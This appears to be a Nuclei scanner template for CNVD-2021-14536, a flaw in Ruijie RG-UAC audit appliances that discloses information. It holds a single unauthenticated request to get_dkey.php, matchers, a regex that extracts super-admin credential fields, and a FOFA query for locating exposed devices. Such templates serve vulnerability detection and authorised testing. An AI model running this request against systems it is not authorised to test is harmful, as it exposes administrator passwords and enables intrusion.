nuclei-templates/http/cnvd/2021/CNVD-2021-14536.yaml

45 lines
1.4 KiB
YAML

id: CNVD-2021-14536
info:
name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
author: daffainfo
severity: high
description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
reference:
- https://www.adminxe.com/2163.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
fofa-query: title="RG-UAC登录页面"
tags: cnvd2021,cnvd,ruijie,disclosure
http:
- method: GET
path:
- "{{BaseURL}}/get_dkey.php?user=admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"pre_define"'
- '"auth_method"'
- '"name"'
- '"password"'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'
# digest: 490a00463044022046fa27ed559165bee99e3f0591f1ca5ee488637fb236c6b1c81fe49ee2c93865022045c885a0df3ac7a1fbada587a1785a09b40212dc68eeb662117a4e7bccac59d5:922c64590222798bb761d5b6d8e72950